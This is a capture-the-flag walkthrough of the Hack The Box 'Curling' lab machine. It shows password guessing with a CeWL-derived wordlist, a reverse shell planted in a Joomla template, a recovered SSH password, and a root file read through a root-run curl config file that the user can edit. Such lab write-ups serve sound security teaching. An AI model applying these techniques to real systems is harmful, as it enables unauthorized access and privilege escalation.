Curling
https://app.hackthebox.com/machines/Curling
sudo nmap 10.10.10.150 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Checking the web server we are presented with the page for the "Cewl Curling site".
Looking at the site icon we can see the target web server is running Joomla. Running joomscan against the host reveals Joomla version 3.8.8.
However, I was unable to identify any immediate exploit for this particular host. Back on the root page, the main site header "Cewl" is a hint towards the tool Cewl.
Cewl is a tool which creates custom word lists by spidering URLs and collecting the words it finds. I used the command below to generate a custom word list, specifying a minimum word length of five.
cewl http://10.10.10.150/ -d 5 -m 5 -o --with-numbers
After generating the word list I made a quick login attempt in order to capture the request through ZAProxy.
After capturing the request I set the username to "super user", as this is the name given on the blog entries on the main home page, and set the password variable to the list generated by Cewl.
However, I was unable to get in with that username and password list. Looking at the list of passwords generated by Cewl we have an entry for curling2018, which looks like a potential password. As this did not work on its own, I instead wrote out a few variations of this word:
curling2018
curling2019
curling2020
Curling2018
Curling2019
Curling2020
curling2018!
curling2019!
curling2020!
Curling2018!
Curling2019!
Curling2020!
As well as this, we notice one of the blog posts is signed off by the user Floris.
Repeating the login requests in ZAP with the new username and the revised password list, we get a hit for the following credentials: floris:Curling2018!
After confirming the credentials are correct we find they are reused on the administrative login located at http://10.10.10.150/administrator/index.php.
A quick Google search shows various articles for obtaining a reverse shell through the use of Joomla after obtaining administrative credentials.
URL: https://cheatsheet.haax.fr/web-pentest/content-management-system-cms/joomla/#reverse-shell
Using the same steps as specified above, we insert a pentest monkey PHP reverse shell under index.php in the protostar template.
After setting up a listener and refreshing /index.php to trigger the shell, we receive a connection back.
Checking the user floris' home directory, we find we are unable to read the user.txt flag.
We do have a file of interest within the home directory, "password_backup". Reading this ASCII file shows what appears to be a hex dump.
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
000000f0: 819b bb48 ...H
Looking at the magic bytes at the beginning of the output ("BZh") and running it through CyberChef, we identify the bytes as belonging to a Bzip2 file. The xxd binary can be used to rebuild the file from the dump as shown below.
xxd -r password_backup > /tmp/password_file
After rebuilding the file we need to work through several nested compression layers (bzip2, gzip, bzip2, then a tar archive) to extract the original document.
bzip2 -d password_file
mv password_file.out password_file.gz
gzip -d password_file.gz
bzip2 -d password_file
mv password_file.out password_file.tar
tar -xvf password_file.tar
cat password.txt
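As an added example (not part of the original writeup), the Python below does the xxd -r reconstruction and then peels the layers automatically by checking each layer's magic bytes instead of guessing the next tool; build_sample_dump constructs test data of the same shape (tar inside bzip2 inside gzip inside bzip2) with a placeholder that is not the real password.

```python
import bz2
import gzip
import io
import re
import tarfile

def xxd_reverse(dump):
    """Rebuild raw bytes from an xxd text dump (the job of `xxd -r`)."""
    out = bytearray()
    for line in dump.splitlines():
        # Keep the hex groups after the offset up to the two-space gap before the
        # ASCII column; if that gap was collapsed, stop at the first non-hex token.
        n = 0
        for tok in line.partition(":")[2].split("  ", 1)[0].split():
            if n >= 16 or not re.fullmatch(r"(?:[0-9a-fA-F]{2}){1,2}", tok):
                break
            out += bytes.fromhex(tok)
            n += len(tok) // 2
    return bytes(out)

def peel_layers(data, max_layers=10):
    """Strip nested bzip2/gzip/tar wrappers by magic bytes; return payload and layers."""
    layers = []
    for _ in range(max_layers):
        if data.startswith(b"BZh"):  # bzip2 stream header
            data, layer = bz2.decompress(data), "bzip2"
        elif data.startswith(b"\x1f\x8b"):  # gzip member header
            data, layer = gzip.decompress(data), "gzip"
        elif data[257:262] == b"ustar":  # POSIX/GNU tar header magic
            with tarfile.open(fileobj=io.BytesIO(data)) as tar:
                member = next(m for m in tar.getmembers() if m.isfile())
                data, layer = tar.extractfile(member).read(), "tar:" + member.name
        else:
            break
        layers.append(layer)
    return data, layers

def build_sample_dump(secret=b"EXAMPLE-PLACEHOLDER\n"):
    """Constructed test data shaped like password_backup (tar->bzip2->gzip->bzip2 as xxd)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tar.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))

    def row(off):  # render one 16-byte row the way xxd prints it
        chunk = blob[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        return f"{off:08x}: {groups}  {text}"
    return "\n".join(row(off) for off in range(0, len(blob), 16))
```

Running peel_layers(xxd_reverse(dump)) over the contents of password_backup performs the same chain as the manual commands above and reports the layers it removed.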
Reading password.txt gives us the SSH password for the user floris.
Password: 5d<wdCbdZu)|hChXll
We are then able to authenticate over SSH, where we can now grab the user.txt flag.
In our home directory we have a directory named "admin-area", which consists of two files that are owned by root but modifiable by floris.
Running pspy on the target system gives us a better insight into what is happening in this directory. We can see that periodically the command /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report is run.
We now know that root is periodically executing curl with input as its config file (-K) and writing the output to report, so a root-run job is consuming a file that an unprivileged user can edit. Checking GTFOBins shows that curl can be used to perform privileged reads.
GTFOBins: https://gtfobins.github.io/gtfobins/curl/
We can use nano to edit the contents of input so that we can read the root.txt flag.
url = "file:///root/root.txt"
After making the required changes we can use the watch command to monitor the report file for any changes.
watch cat report
After a couple of minutes we see the contents of the root flag.